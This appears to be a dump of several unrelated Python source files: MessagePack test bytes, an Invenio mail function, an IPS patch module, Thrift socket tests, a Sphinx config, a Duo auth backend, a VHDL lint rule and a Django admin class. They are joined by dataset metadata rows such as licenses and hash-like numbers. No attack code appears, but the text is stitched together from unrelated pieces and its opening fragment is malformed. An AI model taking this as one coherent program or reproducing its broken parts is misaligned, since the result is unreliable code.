_fixraw = res = b"\x94\xa0\xa1a\xa2bc\xa3def"
_fixmap = res = b"\x82\xc2\x81\xc0\xc0\xc3\x81\xc0\x80"
_unsignedint = res = b"\x99\xcc\x00\xcc\x80\xcc\xff\xcd\x00\x00\xcd\x80\x00" b"\xcd\xff\xff\xce\x00\x00\x00\x00\xce\x80\x00\x00\x00" b"\xce\xff\xff\xff\xff"
_signedint = res = b"\x99\xd0\x00\xd0\x80\xd0\xff\xd1\x00\x00\xd1\x80\x00" b"\xd1\xff\xff\xd2\x00\x00\x00\x00\xd2\x80\x00\x00\x00" b"\xd2\xff\xff\xff\xff"
_raw = res = b"\x96\xda\x00\x00\xda\x00\x01a\xda\x00\x02ab\xdb\x00\x00" b"\x00\x00\xdb\x00\x00\x00\x01a\xdb\x00\x00\x00\x02ab"
_array = res = b"\x96\xdc\x00\x00\xdc\x00\x01\xc0\xdc\x00\x02\xc2\xc3\xdd\x00" b"\x00\x00\x00\xdd\x00\x00\x00\x01\xc0\xdd\x00\x00\x00\x02" b"\xc2\xc3"
_map = res = b"\x96" b"\xde\x00\x00" b"\xde\x00\x01\xc0\xc2" b"\xde\x00\x02\xc0\xc2\xc3\xc2" b"\xdf\x00\x00\x00\x00" b"\xdf\x00\x00\x00\x01\xc0\xc2" b"\xdf\x00\x00\x00\x02\xc0\xc2\xc3\xc2"
x = packet(source=ptypes.prov.string(res))
x=x.l
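## --- illustration (standalone sketch, not part of the original module) ---
## The bit-prefix dispatch that the pbinary definitions above implement,
## written out by hand for the leading byte of a MessagePack object. The
## function name is ours; only the byte ranges come from the format.
def _classify_lead_byte(b):
    if b <= 0x7f:
        return 'positive fixint', b          # high bit clear
    if 0x80 <= b <= 0x8f:
        return 'fixmap', b & 0x0f            # length packed in low 4 bits
    if 0x90 <= b <= 0x9f:
        return 'fixarray', b & 0x0f          # length packed in low 4 bits
    if 0xa0 <= b <= 0xbf:
        return 'fixstr', b & 0x1f            # length packed in low 5 bits
    if b >= 0xe0:
        return 'negative fixint', b - 0x100  # -32 .. -1
    return 'typed message', b                # 0xc0-0xdf: nil, bool, ints, str, ...
if __name__ == '__main__':
    for lead in (0x40, 0x82, 0x91, 0xa3, 0xc0, 0xff):
        print('%#04x -> %r' % (lead, _classify_lead_byte(lead)))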
|
bsd-2-clause
| -6,107,569,118,676,119,000
| 30.808314
| 193
| 0.618819
| false
| 2.872966
| false
| false
| false
|
lbjay/cds-invenio
|
modules/websubmit/lib/functions/Send_Request_For_Refereeing_Process.py
|
1
|
4816
|
## This file is part of CDS Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN.
##
## CDS Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## CDS Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with CDS Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
## Description: function Send_Request_For_Refereeing_Process
## This function sends an email to the publication committee
## chair(s) asking them to select an editorial board for a document
## Author: T.Baron
## PARAMETERS: directory: parameter to the link manager program
## addressesDAM: address of the referee(s)
## categformatDAM: variable needed to extract the category
## of the document and use it to derive the
## address.
## authorfile: name of the file containing the author list
## titleFile: name of the file containing the title
import os
import re
from invenio.config import \
CFG_SITE_NAME, \
CFG_SITE_URL, \
CFG_SITE_SUPPORT_EMAIL
from invenio.access_control_admin import acc_get_role_users,acc_get_role_id
from invenio.websubmit_config import CFG_WEBSUBMIT_COPY_MAILS_TO_ADMIN
from invenio.mailutils import send_email
def Send_Request_For_Refereeing_Process(parameters, curdir, form, user_info=None):
global rn,sysno
# variables declaration
doctype = re.search(".*/([^/]*)/([^/]*)/[^/]*$",curdir).group(2)
FROMADDR = '%s Submission Engine <%s>' % (CFG_SITE_NAME,CFG_SITE_SUPPORT_EMAIL)
otheraddresses = parameters['addressesDAM']
categformat = parameters['categformatDAM']
# retrieve category
categformat = categformat.replace("<CATEG>","([^-]*)")
categs = re.match(categformat,rn)
if categs is not None:
category = categs.group(1)
else:
category = "unknown"
# create TI
if os.path.exists("%s/date" % curdir):
fp = open("%s/date" % curdir, "r")
date = fp.read()
fp.close()
else:
date = ""
if os.path.exists("%s/%s" % (curdir,parameters['titleFile'])):
fp = open("%s/%s" % (curdir,parameters['titleFile']),"r")
title = fp.read()
fp.close()
title = title.replace("\n","")
else:
title = ""
title += " - %s" % date
# create AU
if os.path.exists("%s/%s" % (curdir,parameters['authorfile'])):
fp = open("%s/%s" % (curdir,parameters['authorfile']), "r")
author = fp.read()
fp.close()
else:
author = ""
# we get the referee password
#sth = run_sql("SELECT access FROM sbmAPPROVAL WHERE rn=%s", (rn,))
#if len(sth) >0:
#access = sth[0][0]
# Build referee's email address
refereeaddress = ""
# Try to retrieve the publication committee chair's email from the role database
for user in acc_get_role_users(acc_get_role_id("pubcomchair_%s_%s" % (doctype,category))):
refereeaddress += user[1] + ","
# And if there are general referees
for user in acc_get_role_users(acc_get_role_id("pubcomchair_%s_*" % doctype)):
refereeaddress += user[1] + ","
refereeaddress = re.sub(",$","",refereeaddress)
# Creation of the mail for the referee
addresses = ""
if refereeaddress != "":
addresses = refereeaddress + ","
if otheraddresses != "":
addresses += otheraddresses
else:
addresses = re.sub(",$","",addresses)
title_referee = "Request for refereeing process of %s" % rn
mail_referee = "The document %s has been asked for refereing process to the %s Server..\nYour have to select an editorial board for it.\n\n" % (rn,CFG_SITE_NAME)
mail_referee +="Title: %s\n\nAuthor(s): %s\n\n" % (title,author)
mail_referee +="To access the document(s), select the file(s) from the location:<%s/record/%s/files/>\n\n" % (CFG_SITE_URL,sysno)
mail_referee +="To select an editorial board, you should go to this URL:\n<%s/publiline.py?doctype=%s&categ=%s&RN=%s>\n" % (CFG_SITE_URL,doctype,category,rn)
mail_referee +="---------------------------------------------\nBest regards.\nThe submission team.\n"
#Send mail to referee
send_email(FROMADDR, addresses, title_referee, mail_referee, copy_to_admin=CFG_WEBSUBMIT_COPY_MAILS_TO_ADMIN)
return ""
|
gpl-2.0
| 4,204,461,003,099,882,000
| 44.433962
| 165
| 0.630606
| false
| 3.505095
| false
| false
| false
|
theonlydude/RandomMetroidSolver
|
rom/ips.py
|
1
|
10520
|
import itertools
from utils.utils import range_union
# adapted from ips-util for python 3.2 (https://pypi.org/project/ips-util/)
class IPS_Patch(object):
def __init__(self, patchDict=None):
self.records = []
self.truncate_length = None
self.max_size = 0
if patchDict is not None:
for addr, data in patchDict.items():
byteData = bytearray(data)
self.add_record(addr, byteData)
def toDict(self):
ret = {}
for record in self.records:
if 'rle_count' in record:
ret[record['address']] = [int.from_bytes(record['data'],'little')]*record['rle_count']
else:
ret[record['address']] = [int(b) for b in record['data']]
return ret
@staticmethod
def load(filename):
loaded_patch = IPS_Patch()
with open(filename, 'rb') as file:
header = file.read(5)
if header != b'PATCH':
raise Exception('Not a valid IPS patch file!')
while True:
address_bytes = file.read(3)
if address_bytes == b'EOF':
break
address = int.from_bytes(address_bytes, byteorder='big')
length = int.from_bytes(file.read(2), byteorder='big')
rle_count = 0
if length == 0:
rle_count = int.from_bytes(file.read(2), byteorder='big')
length = 1
data = file.read(length)
if rle_count > 0:
loaded_patch.add_rle_record(address, data, rle_count)
else:
loaded_patch.add_record(address, data)
truncate_bytes = file.read(3)
if len(truncate_bytes) == 3:
loaded_patch.set_truncate_length(int.from_bytes(truncate_bytes, byteorder='big'))
return loaded_patch
@staticmethod
def create(original_data, patched_data):
# The heuristics for optimizing a patch were chosen with reference to
# the source code of Flips: https://github.com/Alcaro/Flips
patch = IPS_Patch()
run_in_progress = False
current_run_start = 0
current_run_data = bytearray()
runs = []
if len(original_data) > len(patched_data):
patch.set_truncate_length(len(patched_data))
original_data = original_data[:len(patched_data)]
elif len(original_data) < len(patched_data):
original_data += bytes([0] * (len(patched_data) - len(original_data)))
# Pin the last byte with an explicit record so applying the patch always
# produces output of the full patched length, even when the final bytes
# only differ by zero-padding.
if original_data[-1] == 0 and patched_data[-1] == 0:
patch.add_record(len(patched_data) - 1, bytes([0]))
for index, (original, patched) in enumerate(zip(original_data, patched_data)):
if not run_in_progress:
if original != patched:
run_in_progress = True
current_run_start = index
current_run_data = bytearray([patched])
else:
if original == patched:
runs.append((current_run_start, current_run_data))
run_in_progress = False
else:
current_run_data.append(patched)
if run_in_progress:
runs.append((current_run_start, current_run_data))
for start, data in runs:
if start == int.from_bytes(b'EOF', byteorder='big'):
start -= 1
data = bytes([patched_data[start - 1]]) + data
grouped_byte_data = list([
{'val': key, 'count': sum(1 for _ in group), 'is_last': False}
for key,group in itertools.groupby(data)
])
grouped_byte_data[-1]['is_last'] = True
record_in_progress = bytearray()
pos = start
for group in grouped_byte_data:
if len(record_in_progress) > 0:
# We don't want to interrupt a record in progress with a new header unless
# this group is longer than two complete headers.
if group['count'] > 13:
patch.add_record(pos, record_in_progress)
pos += len(record_in_progress)
record_in_progress = bytearray()
patch.add_rle_record(pos, bytes([group['val']]), group['count'])
pos += group['count']
else:
record_in_progress += bytes([group['val']] * group['count'])
elif (group['count'] > 3 and group['is_last']) or group['count'] > 8:
# We benefit from making this an RLE record if the length is more than 8,
# or more than 3 and we know it to be the last part of this diff.
# Make sure not to overflow the maximum length. Split it up if necessary.
remaining_length = group['count']
while remaining_length > 0xffff:
patch.add_rle_record(pos, bytes([group['val']]), 0xffff)
remaining_length -= 0xffff
pos += 0xffff
patch.add_rle_record(pos, bytes([group['val']]), remaining_length)
pos += remaining_length
else:
# Just begin a new standard record.
record_in_progress += bytes([group['val']] * group['count'])
if len(record_in_progress) > 0xffff:
patch.add_record(pos, record_in_progress[:0xffff])
record_in_progress = record_in_progress[0xffff:]
pos += 0xffff
# Finalize any record still in progress.
if len(record_in_progress) > 0:
patch.add_record(pos, record_in_progress)
return patch
def add_record(self, address, data):
if address == int.from_bytes(b'EOF', byteorder='big'):
raise RuntimeError('Start address {0:x} is invalid in the IPS format. Please shift your starting address back by one byte to avoid it.'.format(address))
if address > 0xffffff:
raise RuntimeError('Start address {0:x} is too large for the IPS format. Addresses must fit into 3 bytes.'.format(address))
if len(data) > 0xffff:
raise RuntimeError('Record with length {0} is too large for the IPS format. Records must be less than 65536 bytes.'.format(len(data)))
if len(data) == 0: # ignore empty records
return
record = {'address': address, 'data': data, 'size':len(data)}
self.appendRecord(record)
def add_rle_record(self, address, data, count):
if address == int.from_bytes(b'EOF', byteorder='big'):
raise RuntimeError('Start address {0:x} is invalid in the IPS format. Please shift your starting address back by one byte to avoid it.'.format(address))
if address > 0xffffff:
raise RuntimeError('Start address {0:x} is too large for the IPS format. Addresses must fit into 3 bytes.'.format(address))
if count > 0xffff:
raise RuntimeError('RLE record with length {0} is too large for the IPS format. RLE records must be less than 65536 bytes.'.format(count))
if len(data) != 1:
raise RuntimeError('Data for RLE record must be exactly one byte! Received {0}.'.format(data))
record = {'address': address, 'data': data, 'rle_count': count, 'size': count}
self.appendRecord(record)
def appendRecord(self, record):
sz = record['address'] + record['size']
if sz > self.max_size:
self.max_size = sz
self.records.append(record)
def set_truncate_length(self, truncate_length):
self.truncate_length = truncate_length
def encode(self):
encoded_bytes = bytearray()
encoded_bytes += 'PATCH'.encode('ascii')
for record in self.records:
encoded_bytes += record['address'].to_bytes(3, byteorder='big')
if 'rle_count' in record:
encoded_bytes += (0).to_bytes(2, byteorder='big')
encoded_bytes += record['rle_count'].to_bytes(2, byteorder='big')
else:
encoded_bytes += len(record['data']).to_bytes(2, byteorder='big')
encoded_bytes += record['data']
encoded_bytes += 'EOF'.encode('ascii')
if self.truncate_length is not None:
encoded_bytes += self.truncate_length.to_bytes(3, byteorder='big')
return encoded_bytes
# save patch into IPS file
def save(self, path):
with open(path, 'wb') as ipsFile:
ipsFile.write(self.encode())
# applies patch on an existing bytearray
def apply(self, in_data):
out_data = bytearray(in_data)
for record in self.records:
if record['address'] >= len(out_data):
out_data += bytes([0] * (record['address'] - len(out_data) + 1))
if 'rle_count' in record:
out_data[record['address'] : record['address'] + record['rle_count']] = b''.join([record['data']] * record['rle_count'])
else:
out_data[record['address'] : record['address'] + len(record['data'])] = record['data']
if self.truncate_length is not None:
out_data = out_data[:self.truncate_length]
return out_data
# applies patch on an opened file
def applyFile(self, handle):
for record in self.records:
handle.seek(record['address'])
if 'rle_count' in record:
handle.write(record['data'] * record['rle_count'])
else:
handle.write(record['data'])
# appends an IPS_Patch on top of this one
def append(self, patch):
if patch.truncate_length is not None and (self.truncate_length is None or patch.truncate_length > self.truncate_length):
self.set_truncate_length(patch.truncate_length)
for record in patch.records:
if record['size'] > 0: # ignore empty records
self.appendRecord(record)
# gets address ranges written to by this patch
def getRanges(self):
def getRange(record):
return range(record['address'], record['address']+record['size'])
return range_union([getRange(record) for record in self.records])
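# --- usage sketch (not part of the original module) ---
# A minimal round-trip through IPS_Patch.create()/apply(); the byte values
# are made up. Note the extra record pinning the final byte (see create()).
if __name__ == '__main__':
    original = bytes([0x00] * 16)
    patched = bytes([0x00, 0x01, 0x01, 0x01]) + bytes([0x00] * 12)
    patch = IPS_Patch.create(original, patched)
    assert patch.apply(original) == bytearray(patched)
    print(patch.toDict())  # {15: [0], 1: [1, 1, 1]}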
|
gpl-3.0
| 8,996,946,439,968,728,000
| 42.114754
| 164
| 0.552471
| false
| 4.182903
| false
| false
| false
|
facebook/fbthrift
|
thrift/lib/py/transport/TSocketTest.py
|
1
|
5829
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os.path
import socket
import tempfile
import threading
import time
import unittest
import thrift.transport.TSocket as TSocket
import thrift.transport.TTransport as TTransport
class TSocketTest(unittest.TestCase):
def test_usage_as_context_manager(self):
"""
Asserts that both TSocket and TServerSocket can be used with `with` and
that their resources are disposed of at the close of the `with`.
"""
text = b"hi" # sample text to send over the wire
with TSocket.TServerSocket(port=0, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
with TSocket.TSocket(host=addr[0], port=addr[1]) as conn:
conn.write(text)
self.assertFalse(conn.isOpen())
with server.accept() as client:
read = client.read(len(text))
self.assertFalse(conn.isOpen())
self.assertFalse(server.isListening())
self.assertEquals(read, text)
def test_server_context_errors(self):
# Make sure the TServerSocket context manager doesn't
# swallow exceptions
def do_test():
with TSocket.TServerSocket(port=0, family=socket.AF_INET6):
raise Exception('test_error')
self.assertRaisesRegexp(Exception, 'test_error', do_test)
def test_open_failure(self):
# Bind a server socket to an address, but don't actually listen on it.
server_socket = socket.socket(socket.AF_INET6)
try:
server_socket.bind(('::', 0))
server_port = server_socket.getsockname()[1]
# Explicitly use "localhost" as the hostname, so that the
# connect code will try both IPv6 and IPv4. We want to
# exercise the failure behavior when trying multiple addresses.
sock = TSocket.TSocket(host='localhost', port=server_port)
sock.setTimeout(50) # ms
try:
sock.open()
self.fail('unexpectedly succeeded to connect to closed socket')
except TTransport.TTransportException:
# sock.open() should not leave the file descriptor open
# when it fails
self.assertEquals(None, sock.handle)
self.assertEquals({}, sock.handles)
# Calling close() again on the socket should be a no-op,
# and shouldn't throw an error
sock.close()
finally:
server_socket.close()
def test_poller_process(self):
# Make sure that pollers do not fail when they're given None as timeout
text = "hi" # sample text to send over the wire
with TSocket.TServerSocket(port=0, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
def write_data():
# delay writing to verify that poller.process is waiting
time.sleep(1)
with TSocket.TSocket(host=addr[0], port=addr[1]) as conn:
conn.write(text)
poller = TSocket.ConnectionSelect()
thread = threading.Thread(target=write_data)
thread.start()
for filenos in server.handles.keys():
poller.read(filenos)
r, _, x = poller.process(timeout=None)
thread.join()
# Verify that r is non-empty
self.assertTrue(r)
def test_deprecated_str_form_of_port(self):
# Make sure that the deprecated form of the `port` parameter is
# accepted in TServerSocket and TSocket.
port = "0"
text = b"hi" # sample text to send over the wire
# NB: unfortunately unittest.TestCase.assertWarns isn't available until
# py3.
with TSocket.TServerSocket(port=port, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
with TSocket.TSocket(host=addr[0], port=str(addr[1])) as conn:
conn.write(text)
with server.accept() as client:
read = client.read(len(text))
self.assertEquals(read, text)
def test_bad_port(self):
port = 'bogus'
with self.assertRaises(ValueError):
with TSocket.TServerSocket(port=port):
pass
with self.assertRaises(ValueError):
with TSocket.TSocket(port=port):
pass
def test_unix_socket(self):
text = b"hi" # sample text to send over the wire
with tempfile.NamedTemporaryFile(delete=True) as fh:
unix_socket = fh.name
with TSocket.TServerSocket(unix_socket=unix_socket) as server:
with TSocket.TSocket(unix_socket=unix_socket) as conn:
conn.write(text)
with server.accept() as client:
read = client.read(len(text))
self.assertEquals(read, text)
# The socket will not be cleaned up when the server has been shut down.
self.assertTrue(os.path.exists(unix_socket))
|
apache-2.0
| 3,627,083,272,699,399,700
| 38.924658
| 82
| 0.614857
| false
| 4.251641
| true
| false
| false
|
hanoverhr/CAF
|
db/phpm/doc/conf.py
|
1
|
9670
|
# -*- coding: utf-8 -*-
#
# phpMyAdmin documentation build configuration file, created by
# sphinx-quickstart on Wed Sep 26 14:04:48 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "_ext")))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['configext']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'phpMyAdmin'
copyright = u'2012 - 2014, The phpMyAdmin devel team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '4.3.1'
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'html', 'doctrees']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'phpMyAdmindoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'phpMyAdmin.tex', u'phpMyAdmin Documentation',
u'The phpMyAdmin devel team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'phpmyadmin', u'phpMyAdmin Documentation',
[u'The phpMyAdmin devel team'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'phpMyAdmin', u'phpMyAdmin Documentation',
u'The phpMyAdmin devel team', 'phpMyAdmin', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'phpMyAdmin'
epub_author = u'The phpMyAdmin devel team'
epub_publisher = u'The phpMyAdmin devel team'
epub_copyright = copyright
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Highlight PHP without starting <?php tag
from sphinx.highlighting import lexers
from pygments.lexers.web import PhpLexer
lexers['php'] = PhpLexer(startinline=True)
|
gpl-2.0
| -7,684,980,086,626,668,000
| 30.809211
| 82
| 0.709824
| false
| 3.704981
| true
| false
| false
|
ptone/django-duo-auth
|
duo_auth/backends.py
|
1
|
1061
|
import datetime
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth.models import User
from duo_auth.models import VerificationDetails
class auth_backend(ModelBackend):
supports_object_permissions = False
supports_anonymous_user = False
supports_inactive_user = False
def authenticate(self, username=None, password=None, passcode=None):
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
return None
if not user.check_password(password):
return None
try:
verification_details = user.two_factor_details
except VerificationDetails.DoesNotExist:
# for users that don't have verification details available
# log them in regularly
return user
if passcode == verification_details.challenge_passcode:
verification_details.last_verified = datetime.datetime.utcnow()
verification_details.save()
return user
return None
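# --- usage sketch (illustrative, not part of the original module) ---
# The backend is reached through Django's normal authenticate() machinery;
# the extra `passcode` keyword is forwarded to authenticate() above. The
# settings value is an assumption about how the app would be wired up:
#
#   AUTHENTICATION_BACKENDS = ('duo_auth.backends.auth_backend',)
#
#   from django.contrib.auth import authenticate
#   user = authenticate(username='alice', password='secret', passcode='123456')
#   # user is None unless the password (and, when enrolled, passcode) match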
|
mit
| -7,481,110,555,969,955,000
| 30.205882
| 75
| 0.66918
| false
| 4.866972
| false
| false
| false
|
jeremiah-c-leary/vhdl-style-guide
|
vsg/rules/single_space_between_tokens.py
|
1
|
1864
|
from vsg import parser
from vsg import rule
from vsg import violation
from vsg.rules import utils as rules_utils
from vsg.vhdlFile import utils
class single_space_between_tokens(rule.Rule):
'''
Checks for a single space between two tokens.
Parameters
----------
name : string
The group the rule belongs to.
identifier : string
unique identifier. Usually in the form of 00N.
left_token : token object
The left token; the rule checks for a single space between it and the right token
right_token : token object
The right token; the rule checks for a single space between it and the left token
'''
def __init__(self, name, identifier, left_token, right_token):
rule.Rule.__init__(self, name=name, identifier=identifier)
self.solution = None
self.phase = 2
self.left_token = left_token
self.right_token = right_token
def _get_tokens_of_interest(self, oFile):
lToi_a = oFile.get_sequence_of_tokens_matching([self.left_token, parser.whitespace, self.right_token])
lToi_b = oFile.get_sequence_of_tokens_matching([self.left_token, self.right_token])
return utils.combine_two_token_class_lists(lToi_a, lToi_b)
def _analyze(self, lToi):
for oToi in lToi:
lTokens = oToi.get_tokens()
if len(lTokens) == 2:
self.add_violation(violation.New(oToi.get_line_number(), oToi, self.solution))
elif len(lTokens[1].get_value()) != 1:
self.add_violation(violation.New(oToi.get_line_number(), oToi, self.solution))
def _fix_violation(self, oViolation):
lTokens = oViolation.get_tokens()
if isinstance(lTokens[1], parser.whitespace):
lTokens[1].set_value(' ')
else:
rules_utils.insert_whitespace(lTokens, 1)
oViolation.set_tokens(lTokens)
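# --- usage sketch (illustrative; the token classes below are hypothetical) ---
# Concrete rules bind two tokens to this base class, roughly:
#
#   class rule_100(single_space_between_tokens):
#       def __init__(self):
#           single_space_between_tokens.__init__(
#               self, name='example', identifier='100',
#               left_token=token.example.keyword,
#               right_token=token.example.open_paren)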
|
gpl-3.0
| 8,277,113,610,826,553,000
| 30.59322
| 110
| 0.637876
| false
| 3.550476
| false
| false
| false
|
yunojuno/elasticsearch-django
|
elasticsearch_django/admin.py
|
1
|
3501
|
import logging
import simplejson as json # simplejson supports Decimal serialization
from django.contrib import admin
from django.template.defaultfilters import truncatechars, truncatewords
from django.utils.safestring import mark_safe
from .models import SearchQuery
logger = logging.getLogger(__name__)
def pprint(data: dict) -> str:
"""
Return an indented HTML pretty-print version of JSON.
Take the event_payload JSON, indent it, order the keys and then
present it as a <code> block. That's about as good as we can get
until someone builds a custom syntax function.
"""
pretty = json.dumps(data, sort_keys=True, indent=4, separators=(",", ": "))
html = pretty.replace(" ", "&nbsp;").replace("\n", "<br>")
return mark_safe("<code>%s</code>" % html)
class SearchQueryAdmin(admin.ModelAdmin):
list_display = (
"id",
"user",
"search_terms_display",
"total_hits_display",
"returned_",
"min_",
"max_",
"reference",
"executed_at",
)
list_filter = ("index", "query_type")
search_fields = ("search_terms", "user__first_name", "user__last_name", "reference")
# excluding because we are using a pretty version instead
exclude = ("hits", "aggregations", "query", "page", "total_hits_")
readonly_fields = (
"user",
"index",
"search_terms",
"query_type",
"total_hits",
"total_hits_relation",
"returned_",
"min_",
"max_",
"duration",
"query_",
"hits_",
"aggregations_",
"executed_at",
)
def search_terms_display(self, instance: SearchQuery) -> str:
"""Return truncated version of search_terms."""
raw = instance.search_terms
# take first five words, and further truncate to 50 chars if necessary
return truncatechars(truncatewords(raw, 5), 50)
def query_(self, instance: SearchQuery) -> str:
"""Return pretty version of query JSON."""
return pprint(instance.query)
def max_(self, instance: SearchQuery) -> str:
"""Return pretty version of max_score."""
return "-" if instance.page_size == 0 else str(instance.max_score)
max_.short_description = "Max score" # type: ignore
def min_(self, instance: SearchQuery) -> str:
"""Return pretty version of min_score."""
return "-" if instance.page_size == 0 else str(instance.min_score)
min_.short_description = "Min score" # type: ignore
def total_hits_display(self, instance: SearchQuery) -> str:
"""Return total hit count, annotated if lower bound."""
if instance.total_hits_relation == SearchQuery.TotalHitsRelation.ESTIMATE:
return f"{instance.total_hits}*"
return f"{instance.total_hits}"
